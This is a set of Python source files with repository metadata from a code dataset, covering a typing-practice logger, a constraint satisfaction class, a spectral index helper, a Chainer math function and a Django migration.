time_msec.value = int((time.time() - ut_start) * 1000)
timeout_event.set()
def get_df(log_filename=None, date=0):
if log_filename is None:
logpath = os.getenv('TYPRO_LOG_PATH')
if logpath is None:
logpath = os.getenv('HOME')
if logpath[-1] != '/':
logpath += '/'
log_filename = logpath + 'typro_results.csv'
df_origin = pd.read_csv(log_filename)
char_int = df_origin.columns[6:]
char = [chr(int(i)) for i in char_int]
df = df_origin.rename(columns=dict(zip(char_int, char)))
df.insert(4, 'mistype', df_origin.iloc[:,6:].sum(axis=1), True)
df.index = pd.DatetimeIndex(pd.to_datetime(df.timestamp, unit='s',utc=True),
name='date').tz_convert('Asia/Tokyo')
# df = df[df['time'] > args.time]
if date == 0:
date = 10000 # huge value
current_date = pd.to_datetime(int(time.time()), unit='s', utc=True)
current_date = current_date.tz_convert('Asia/Tokyo')
return df[df.index>current_date - pd.Timedelta(date, 'days') ]
def show_ranking(log_filename, date):
print(log_filename)
df = get_df(log_filename, date)
user_speed = {}
for user in np.unique(df['user']):
_df = df[df['user'] == user]
user_speed[user] = _df['speed'].max()
rank = sorted(user_speed.items(), key = lambda x : x[1], reverse=True)
print('user ranking')
for r in rank:
print(r[0] + '\t\t' + '{:.1f}'.format(r[1]))
def show_summary(log_filename, user, date):
df = get_df(log_filename, date)
df = df[df['user'] == user]
print(user)
print('Top 10 miss')
print(df.sum(axis=0)[7:].sort_values(ascending=False)[:10])
def make_trainings(args):
# File
env_path = os.getenv('TYPRO_PATH')
env_file = os.getenv('TYPRO_FILE')
use_user_file = True
if not args.path is 'None': # Priority 1 : Use option
path = args.path
elif not env_path is None: # Priority 2 : Use environment variable
path = env_path
else: # Priority 3 : Use package data
path = 'data'
use_user_file = False
if not args.file is 'None':
filename = args.file
elif not env_file is None:
filename = env_file
else:
filename = 'default'
if use_user_file:
if path[-1] != '/':
path += '/'
train_filename = path + filename
if not os.path.exists(train_filename):
print('No such file : ' + train_filename)
sys.exit()
with open(train_filename) as f:
training_list = [s.strip() for s in f.readlines() if len(s.strip()) > 0]
else:
# package file
training_files = pkg_resources.resource_listdir('typro', 'data')
if not filename in training_files:
print('No such training file included. Use')
print(training_files)
sys.exit()
st = pkg_resources.resource_string('typro', 'data/' + filename).decode('utf-8')
training_list = st.split('\n')
training_list = [s.strip() for s in training_list if len(s) > 0]
if not args.order:
random.shuffle(training_list)
# Remove decoration lines like // --------------------------
# training_list = [st for st in training_list
# if collections.Counter([s for s in st]).most_common()[0][1] < 15]
# Log file
logpath = os.getenv('TYPRO_LOG_PATH')
if not args.logpath is 'None':
logpath = args.logpath
elif logpath is None:
logpath = os.getenv('HOME')
if logpath[-1] != '/':
logpath += '/'
logpathfile = logpath + args.logfile
return training_list, path, filename, logpathfile
if __name__ == "__main__":
main()
| 12,381 | 0 | 207 |
9d2b134528efd1519790f90bdca15b1f067664aa | 46 | py | Python | beginner/chapter_1/exam_1_2.py | Bokji24Dev/CodeStudy | 4c0fc852e6f472d082e9836c59ad22d229f74d87 | [
"MIT"
] | null | null | null | beginner/chapter_1/exam_1_2.py | Bokji24Dev/CodeStudy | 4c0fc852e6f472d082e9836c59ad22d229f74d87 | [
"MIT"
] | null | null | null | beginner/chapter_1/exam_1_2.py | Bokji24Dev/CodeStudy | 4c0fc852e6f472d082e9836c59ad22d229f74d87 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
Print("Hello World!")
| 11.5 | 22 | 0.543478 | # -*- coding:utf-8 -*-
Print("Hello World!")
| 0 | 0 | 0 |
40f0c3601816e6c50563220f9bc0a95f7282cb07 | 10,389 | py | Python | dwavebinarycsp/core/csp.py | arcondello/dwavebinarycsp | 9df371a8456d3aa37f738e2089236a76822347ce | [
"Apache-2.0"
] | null | null | null | dwavebinarycsp/core/csp.py | arcondello/dwavebinarycsp | 9df371a8456d3aa37f738e2089236a76822347ce | [
"Apache-2.0"
] | null | null | null | dwavebinarycsp/core/csp.py | arcondello/dwavebinarycsp | 9df371a8456d3aa37f738e2089236a76822347ce | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
"""
Constraint satisfaction problems require that all a problem's variables be assigned
values, out of a finite domain, that result in the satisfying of all constraints.
The :class:`ConstraintSatisfactionProblem` class aggregates all constraints and variables
defined for a problem and provides functionality to assist in problem solution, such
as verifying whether a candidate solution satisfies the constraints.
"""
from collections import Callable, Iterable, defaultdict
import dimod
from dwavebinarycsp.core.constraint import Constraint
class ConstraintSatisfactionProblem(object):
"""A constraint satisfaction problem.
Args:
vartype (:class:`~dimod.Vartype`/str/set):
Variable type for the binary quadratic model. Supported values are:
* :attr:`~dimod.Vartype.SPIN`, ``'SPIN'``, ``{-1, 1}``
* :attr:`~dimod.Vartype.BINARY`, ``'BINARY'``, ``{0, 1}``
Attributes:
constraints (list[:obj:`.Constraint`]):
Constraints that together constitute the constraint satisfaction problem. Valid solutions
satisfy all of the constraints.
variables (dict[variable, list[:obj:`.Constraint`]]):
Variables of the constraint satisfaction problem as a dict, where keys are the variables
and values a list of all of constraints associated with the variable.
vartype (:class:`dimod.Vartype`):
Enumeration of valid variable types. Supported values are :attr:`~dimod.Vartype.SPIN`
or :attr:`~dimod.Vartype.BINARY`. If `vartype` is SPIN, variables can be assigned -1 or 1;
if BINARY, variables can be assigned 0 or 1.
Example:
This example creates a binary-valued constraint satisfaction problem, adds two constraints,
:math:`a = b` and :math:`b \\ne c`, and tests :math:`a,b,c = 1,1,0`.
>>> import dwavebinarycsp
>>> import operator
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem('BINARY')
>>> csp.add_constraint(operator.eq, ['a', 'b'])
>>> csp.add_constraint(operator.ne, ['b', 'c'])
>>> csp.check({'a': 1, 'b': 1, 'c': 0})
True
"""
@dimod.vartype_argument('vartype')
def add_constraint(self, constraint, variables=tuple()):
"""Add a constraint.
Args:
constraint (function/iterable/:obj:`.Constraint`):
Constraint definition in one of the supported formats:
1. Function, with input arguments matching the order and
:attr:`~.ConstraintSatisfactionProblem.vartype` type of the `variables`
argument, that evaluates True when the constraint is satisfied.
2. List explicitly specifying each allowed configuration as a tuple.
3. :obj:`.Constraint` object built either explicitly or by :mod:`dwavebinarycsp.factories`.
variables(iterable):
Variables associated with the constraint. Not required when `constraint` is
a :obj:`.Constraint` object.
Examples:
This example defines a function that evaluates True when the constraint is satisfied.
The function's input arguments match the order and type of the `variables` argument.
>>> import dwavebinarycsp
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
>>> def all_equal(a, b, c): # works for both dwavebinarycsp.BINARY and dwavebinarycsp.SPIN
... return (a == b) and (b == c)
>>> csp.add_constraint(all_equal, ['a', 'b', 'c'])
>>> csp.check({'a': 0, 'b': 0, 'c': 0})
True
>>> csp.check({'a': 0, 'b': 0, 'c': 1})
False
This example explicitly lists allowed configurations.
>>> import dwavebinarycsp
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
>>> eq_configurations = {(-1, -1), (1, 1)}
>>> csp.add_constraint(eq_configurations, ['v0', 'v1'])
>>> csp.check({'v0': -1, 'v1': +1})
False
>>> csp.check({'v0': -1, 'v1': -1})
True
This example uses a :obj:`.Constraint` object built by :mod:`dwavebinarycsp.factories`.
>>> import dwavebinarycsp
>>> import dwavebinarycsp.factories.constraint.gates as gates
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
>>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
>>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
>>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
True
"""
if isinstance(constraint, Constraint):
if variables and (tuple(variables) != constraint.variables):
raise ValueError("mismatched variables and Constraint")
elif isinstance(constraint, Callable):
constraint = Constraint.from_func(constraint, variables, self.vartype)
elif isinstance(constraint, Iterable):
constraint = Constraint.from_configurations(constraint, variables, self.vartype)
else:
raise TypeError("Unknown constraint type given")
self.constraints.append(constraint)
for v in constraint.variables:
self.variables[v].append(constraint)
def add_variable(self, v):
"""Add a variable.
Args:
v (variable):
Variable in the constraint satisfaction problem. May be of any type that
can be a dict key.
Examples:
This example adds two variables, one of which is already used in a constraint
of the constraint satisfaction problem.
>>> import dwavebinarycsp
>>> import operator
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
>>> csp.add_constraint(operator.eq, ['a', 'b'])
>>> csp.add_variable('a') # does nothing, already added as part of the constraint
>>> csp.add_variable('c')
>>> csp.check({'a': -1, 'b': -1, 'c': 1})
True
>>> csp.check({'a': -1, 'b': -1, 'c': -1})
True
"""
self.variables[v] # because defaultdict will create it if it's not there
def check(self, solution):
"""Check that a solution satisfies all of the constraints.
Args:
solution (container):
An assignment of values for the variables in the constraint satisfaction problem.
Returns:
bool: True if the solution satisfies all of the constraints; False otherwise.
Examples:
This example creates a binary-valued constraint satisfaction problem, adds
two logic gates implementing Boolean constraints, :math:`c = a \wedge b`
and :math:`d = a \oplus c`, and verifies that the combined problem is satisfied
for a given assignment.
>>> import dwavebinarycsp
>>> import dwavebinarycsp.factories.constraint.gates as gates
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
>>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
>>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
>>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
True
"""
return all(constraint.check(solution) for constraint in self.constraints)
def fix_variable(self, v, value):
"""Fix the value of a variable and remove it from the constraint satisfaction problem.
Args:
v (variable):
Variable to be fixed in the constraint satisfaction problem.
value (int):
Value assigned to the variable. Values must match the
:attr:`~.ConstraintSatisfactionProblem.vartype` of the constraint
satisfaction problem.
Examples:
This example creates a spin-valued constraint satisfaction problem, adds two constraints,
:math:`a = b` and :math:`b \\ne c`, and fixes variable b to +1.
>>> import dwavebinarycsp
>>> import operator
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
>>> csp.add_constraint(operator.eq, ['a', 'b'])
>>> csp.add_constraint(operator.ne, ['b', 'c'])
>>> csp.check({'a': +1, 'b': +1, 'c': -1})
True
>>> csp.check({'a': -1, 'b': -1, 'c': +1})
True
>>> csp.fix_variable('b', +1)
>>> csp.check({'a': +1, 'b': +1, 'c': -1}) # 'b' is ignored
True
>>> csp.check({'a': -1, 'b': -1, 'c': +1})
False
>>> csp.check({'a': +1, 'c': -1})
True
>>> csp.check({'a': -1, 'c': +1})
False
"""
if v not in self.variables:
raise ValueError("given variable {} is not part of the constraint satisfaction problem".format(v))
for constraint in self.variables[v]:
constraint.fix_variable(v, value)
del self.variables[v] # delete the variable
CSP = ConstraintSatisfactionProblem
"""An alias for :class:`.ConstraintSatisfactionProblem`."""
| 42.753086 | 110 | 0.594282 | # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
"""
Constraint satisfaction problems require that all a problem's variables be assigned
values, out of a finite domain, that result in the satisfying of all constraints.
The :class:`ConstraintSatisfactionProblem` class aggregates all constraints and variables
defined for a problem and provides functionality to assist in problem solution, such
as verifying whether a candidate solution satisfies the constraints.
"""
from collections import Callable, Iterable, defaultdict
import dimod
from dwavebinarycsp.core.constraint import Constraint
class ConstraintSatisfactionProblem(object):
"""A constraint satisfaction problem.
Args:
vartype (:class:`~dimod.Vartype`/str/set):
Variable type for the binary quadratic model. Supported values are:
* :attr:`~dimod.Vartype.SPIN`, ``'SPIN'``, ``{-1, 1}``
* :attr:`~dimod.Vartype.BINARY`, ``'BINARY'``, ``{0, 1}``
Attributes:
constraints (list[:obj:`.Constraint`]):
Constraints that together constitute the constraint satisfaction problem. Valid solutions
satisfy all of the constraints.
variables (dict[variable, list[:obj:`.Constraint`]]):
Variables of the constraint satisfaction problem as a dict, where keys are the variables
and values a list of all of constraints associated with the variable.
vartype (:class:`dimod.Vartype`):
Enumeration of valid variable types. Supported values are :attr:`~dimod.Vartype.SPIN`
or :attr:`~dimod.Vartype.BINARY`. If `vartype` is SPIN, variables can be assigned -1 or 1;
if BINARY, variables can be assigned 0 or 1.
Example:
This example creates a binary-valued constraint satisfaction problem, adds two constraints,
:math:`a = b` and :math:`b \\ne c`, and tests :math:`a,b,c = 1,1,0`.
>>> import dwavebinarycsp
>>> import operator
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem('BINARY')
>>> csp.add_constraint(operator.eq, ['a', 'b'])
>>> csp.add_constraint(operator.ne, ['b', 'c'])
>>> csp.check({'a': 1, 'b': 1, 'c': 0})
True
"""
@dimod.vartype_argument('vartype')
def __init__(self, vartype):
self.vartype = vartype
self.constraints = []
self.variables = defaultdict(list)
def __len__(self):
return self.constraints.__len__()
def add_constraint(self, constraint, variables=tuple()):
"""Add a constraint.
Args:
constraint (function/iterable/:obj:`.Constraint`):
Constraint definition in one of the supported formats:
1. Function, with input arguments matching the order and
:attr:`~.ConstraintSatisfactionProblem.vartype` type of the `variables`
argument, that evaluates True when the constraint is satisfied.
2. List explicitly specifying each allowed configuration as a tuple.
3. :obj:`.Constraint` object built either explicitly or by :mod:`dwavebinarycsp.factories`.
variables(iterable):
Variables associated with the constraint. Not required when `constraint` is
a :obj:`.Constraint` object.
Examples:
This example defines a function that evaluates True when the constraint is satisfied.
The function's input arguments match the order and type of the `variables` argument.
>>> import dwavebinarycsp
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
>>> def all_equal(a, b, c): # works for both dwavebinarycsp.BINARY and dwavebinarycsp.SPIN
... return (a == b) and (b == c)
>>> csp.add_constraint(all_equal, ['a', 'b', 'c'])
>>> csp.check({'a': 0, 'b': 0, 'c': 0})
True
>>> csp.check({'a': 0, 'b': 0, 'c': 1})
False
This example explicitly lists allowed configurations.
>>> import dwavebinarycsp
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
>>> eq_configurations = {(-1, -1), (1, 1)}
>>> csp.add_constraint(eq_configurations, ['v0', 'v1'])
>>> csp.check({'v0': -1, 'v1': +1})
False
>>> csp.check({'v0': -1, 'v1': -1})
True
This example uses a :obj:`.Constraint` object built by :mod:`dwavebinarycsp.factories`.
>>> import dwavebinarycsp
>>> import dwavebinarycsp.factories.constraint.gates as gates
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
>>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
>>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
>>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
True
"""
if isinstance(constraint, Constraint):
if variables and (tuple(variables) != constraint.variables):
raise ValueError("mismatched variables and Constraint")
elif isinstance(constraint, Callable):
constraint = Constraint.from_func(constraint, variables, self.vartype)
elif isinstance(constraint, Iterable):
constraint = Constraint.from_configurations(constraint, variables, self.vartype)
else:
raise TypeError("Unknown constraint type given")
self.constraints.append(constraint)
for v in constraint.variables:
self.variables[v].append(constraint)
def add_variable(self, v):
"""Add a variable.
Args:
v (variable):
Variable in the constraint satisfaction problem. May be of any type that
can be a dict key.
Examples:
This example adds two variables, one of which is already used in a constraint
of the constraint satisfaction problem.
>>> import dwavebinarycsp
>>> import operator
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
>>> csp.add_constraint(operator.eq, ['a', 'b'])
>>> csp.add_variable('a') # does nothing, already added as part of the constraint
>>> csp.add_variable('c')
>>> csp.check({'a': -1, 'b': -1, 'c': 1})
True
>>> csp.check({'a': -1, 'b': -1, 'c': -1})
True
"""
self.variables[v] # because defaultdict will create it if it's not there
def check(self, solution):
"""Check that a solution satisfies all of the constraints.
Args:
solution (container):
An assignment of values for the variables in the constraint satisfaction problem.
Returns:
bool: True if the solution satisfies all of the constraints; False otherwise.
Examples:
This example creates a binary-valued constraint satisfaction problem, adds
two logic gates implementing Boolean constraints, :math:`c = a \wedge b`
and :math:`d = a \oplus c`, and verifies that the combined problem is satisfied
for a given assignment.
>>> import dwavebinarycsp
>>> import dwavebinarycsp.factories.constraint.gates as gates
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.BINARY)
>>> csp.add_constraint(gates.and_gate(['a', 'b', 'c'])) # add an AND gate
>>> csp.add_constraint(gates.xor_gate(['a', 'c', 'd'])) # add an XOR gate
>>> csp.check({'a': 1, 'b': 0, 'c': 0, 'd': 1})
True
"""
return all(constraint.check(solution) for constraint in self.constraints)
def fix_variable(self, v, value):
"""Fix the value of a variable and remove it from the constraint satisfaction problem.
Args:
v (variable):
Variable to be fixed in the constraint satisfaction problem.
value (int):
Value assigned to the variable. Values must match the
:attr:`~.ConstraintSatisfactionProblem.vartype` of the constraint
satisfaction problem.
Examples:
This example creates a spin-valued constraint satisfaction problem, adds two constraints,
:math:`a = b` and :math:`b \\ne c`, and fixes variable b to +1.
>>> import dwavebinarycsp
>>> import operator
>>> csp = dwavebinarycsp.ConstraintSatisfactionProblem(dwavebinarycsp.SPIN)
>>> csp.add_constraint(operator.eq, ['a', 'b'])
>>> csp.add_constraint(operator.ne, ['b', 'c'])
>>> csp.check({'a': +1, 'b': +1, 'c': -1})
True
>>> csp.check({'a': -1, 'b': -1, 'c': +1})
True
>>> csp.fix_variable('b', +1)
>>> csp.check({'a': +1, 'b': +1, 'c': -1}) # 'b' is ignored
True
>>> csp.check({'a': -1, 'b': -1, 'c': +1})
False
>>> csp.check({'a': +1, 'c': -1})
True
>>> csp.check({'a': -1, 'c': +1})
False
"""
if v not in self.variables:
raise ValueError("given variable {} is not part of the constraint satisfaction problem".format(v))
for constraint in self.variables[v]:
constraint.fix_variable(v, value)
del self.variables[v] # delete the variable
CSP = ConstraintSatisfactionProblem
"""An alias for :class:`.ConstraintSatisfactionProblem`."""
| 150 | 0 | 53 |
5f052a63c206b64e95ae6a86f33251a40b0a7a0c | 1,771 | py | Python | src/radiomap/__init__.py | avialxee/radiomap | a14acc348fb867b32c0ea3b4ce97ba9726c3e714 | [
"BSD-3-Clause"
] | null | null | null | src/radiomap/__init__.py | avialxee/radiomap | a14acc348fb867b32c0ea3b4ce97ba9726c3e714 | [
"BSD-3-Clause"
] | null | null | null | src/radiomap/__init__.py | avialxee/radiomap | a14acc348fb867b32c0ea3b4ce97ba9726c3e714 | [
"BSD-3-Clause"
] | null | null | null | #-- author: @avialxee ---#--#
#from radmap import rad_helpers
from _helpers import vz_query
import numpy as np
tgss = [[1, 12, 0.003], [2, 22, 32]]
nvss = [[12, 2, 13], [12, 2, 0.2]]
#tgss = np.array(tgss)
ins = RadioMap()
#
#print(tgss)
#print(nvss)
ind = np.where(np.array(tgss) < 0.015)
tgss[ind] =0.0
print(ins.spectral_index(tgss, nvss))
#print(ins.throw_output()) | 26.833333 | 83 | 0.557312 | #-- author: @avialxee ---#--#
#from radmap import rad_helpers
from _helpers import vz_query
import numpy as np
class RadioMap:
def __init__(self, position='', radius=float(0.12)) -> None:
self.position = str(position)
self.radius = float(radius)
self.wcs = None
self.status = 403
self.info = 'not available yet'
self.msg = []
def throw_output(self):
"""
returns output showing status of output.
"""
return {'status' : self.status, 'info': self.info, 'message':str(self.msg)}
def spectral_index(self, tgss, nvss):
"""
alpha = - log(tgss_s/nvss_s)/log(tgss_v/nvss_v)
TODO: error calculations.
"""
factor = 150/1420 # tgss_v/nvss_v
px = []
try:
tgss, nvss, dim = self._sanitize_svy(tgss,nvss)
self.status = 200
self.info = 'success'
si = -np.round(np.log(np.divide(tgss, nvss))/np.log(factor), 3)
self.msg.append({'max spectral index': np.max(np.reshape(si, dim))})
return np.reshape(si, dim)
except Exception as e:
self.status = 417
self.info = 'failed'
self.msg.append({'exception': str(e)})
return 'failed'
@staticmethod
def _sanitize_svy(tgss, nvss):
tgss, nvss = np.array(tgss), np.array(nvss)
dim = tgss.shape
tgss, nvss = tgss.flat, nvss.flat
return tgss, nvss, dim
tgss = [[1, 12, 0.003], [2, 22, 32]]
nvss = [[12, 2, 13], [12, 2, 0.2]]
#tgss = np.array(tgss)
ins = RadioMap()
#
#print(tgss)
#print(nvss)
ind = np.where(np.array(tgss) < 0.015)
tgss[ind] =0.0
print(ins.spectral_index(tgss, nvss))
#print(ins.throw_output()) | 385 | 988 | 23 |
208ec47a64ed3efe67e55ee276a49e934e71d0b8 | 2,015 | py | Python | chainer/functions/math/squared_difference.py | tkerola/chainer | 572f6eef2c3f1470911ac08332c2b5c3440edf44 | [
"MIT"
] | 1 | 2021-02-26T10:27:25.000Z | 2021-02-26T10:27:25.000Z | chainer/functions/math/squared_difference.py | hitsgub/chainer | 20d4d70f5cdacc1f24f243443f5bebc2055c8f8e | [
"MIT"
] | null | null | null | chainer/functions/math/squared_difference.py | hitsgub/chainer | 20d4d70f5cdacc1f24f243443f5bebc2055c8f8e | [
"MIT"
] | 2 | 2019-07-16T00:24:47.000Z | 2021-02-26T10:27:27.000Z | from chainer import backend
from chainer import function_node
from chainer import utils
from chainer.utils import type_check
class SquaredDifference(function_node.FunctionNode):
"""Squared difference of input variables."""
def squared_difference(x1, x2):
"""Squared difference of input variables.
Args:
x1 (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variables to be compared.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
x2 (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variables to be compared.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
Returns:
~chainer.Variable: ``(x1 - x2) ** 2`` element-wise.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
.. admonition:: Example
>>> x1 = np.arange(6).astype(np.float32)
>>> x1
array([0., 1., 2., 3., 4., 5.], dtype=float32)
>>> x2 = np.array([5, 4, 3, 2, 1, 0]).astype(np.float32)
>>> x2
array([5., 4., 3., 2., 1., 0.], dtype=float32)
>>> y = F.squared_difference(x1, x2)
>>> y.shape
(6,)
>>> y.array
array([25., 9., 1., 1., 9., 25.], dtype=float32)
"""
return SquaredDifference().apply((x1, x2))[0]
| 30.530303 | 64 | 0.554839 | from chainer import backend
from chainer import function_node
from chainer import utils
from chainer.utils import type_check
class SquaredDifference(function_node.FunctionNode):
"""Squared difference of input variables."""
def check_type_forward(self, in_types):
type_check._argname(in_types, ('x1', 'x2'))
type_check.expect(
in_types[0].dtype.kind == 'f',
in_types[0].dtype == in_types[1].dtype,
in_types[0].shape == in_types[1].shape
)
def forward(self, inputs):
self.retain_inputs((0, 1))
xp = backend.get_array_module(*inputs)
x1, x2 = inputs
difference = x1 - x2
y = xp.square(difference)
return utils.force_array(y, dtype=x1.dtype),
def backward(self, indexes, grads):
gy, = grads
x1, x2 = self.get_retained_inputs()
difference = x1 - x2
gx = gy * 2 * difference
return gx, -gx
def squared_difference(x1, x2):
"""Squared difference of input variables.
Args:
x1 (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variables to be compared.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
x2 (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variables to be compared.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
Returns:
~chainer.Variable: ``(x1 - x2) ** 2`` element-wise.
A :math:`(s_1, s_2, ..., s_N)` -shaped float array.
.. admonition:: Example
>>> x1 = np.arange(6).astype(np.float32)
>>> x1
array([0., 1., 2., 3., 4., 5.], dtype=float32)
>>> x2 = np.array([5, 4, 3, 2, 1, 0]).astype(np.float32)
>>> x2
array([5., 4., 3., 2., 1., 0.], dtype=float32)
>>> y = F.squared_difference(x1, x2)
>>> y.shape
(6,)
>>> y.array
array([25., 9., 1., 1., 9., 25.], dtype=float32)
"""
return SquaredDifference().apply((x1, x2))[0]
| 643 | 0 | 81 |
abad2905f2dfbd24fa36edc81b85288f2a0820c5 | 2,684 | py | Python | server/applications/migrations/0001_initial.py | eBioKit/ebiokit-site | f9c8931aca6a8009f313a409fed8314300dfeca8 | [
"MIT"
] | 1 | 2019-11-10T09:25:02.000Z | 2019-11-10T09:25:02.000Z | server/applications/migrations/0001_initial.py | eBioKit/ebiokit-site | f9c8931aca6a8009f313a409fed8314300dfeca8 | [
"MIT"
] | 5 | 2018-02-01T19:21:48.000Z | 2021-06-10T20:10:18.000Z | server/applications/migrations/0001_initial.py | eBioKit/ebiokit-site | f9c8931aca6a8009f313a409fed8314300dfeca8 | [
"MIT"
] | 2 | 2019-05-20T07:59:17.000Z | 2019-11-10T09:25:05.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-22 11:37
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
| 41.292308 | 114 | 0.554396 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-22 11:37
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('instance_name', models.CharField(max_length=100, unique=True)),
('service', models.CharField(max_length=100)),
('version', models.CharField(default=b'0.1', max_length=100)),
('title', models.CharField(default=b'New application', max_length=100)),
('description', models.CharField(max_length=1000)),
('categories', models.CharField(max_length=500)),
('website', models.CharField(max_length=500)),
('port', models.CharField(max_length=100, unique=True)),
('type', models.CharField(default=b'1', max_length=1)),
('installed', models.DateTimeField(default=django.utils.timezone.now)),
('enabled', models.BooleanField(default=1)),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.CharField(max_length=100, primary_key=True, serialize=False)),
('name', models.CharField(max_length=300)),
('date', models.CharField(max_length=12)),
],
),
migrations.CreateModel(
name='RemoteServer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True)),
('url', models.CharField(max_length=300)),
('enabled', models.BooleanField(default=0)),
],
),
migrations.CreateModel(
name='Task',
fields=[
('job_id', models.CharField(max_length=100)),
('id', models.CharField(max_length=300, primary_key=True, serialize=False)),
('name', models.CharField(max_length=300)),
('command', models.TextField(default=b'')),
('function', models.TextField(default=b'')),
('params', models.TextField(default=b'')),
('depend', models.TextField(default=b'')),
('status', models.CharField(max_length=100)),
],
),
]
| 0 | 2,476 | 23 |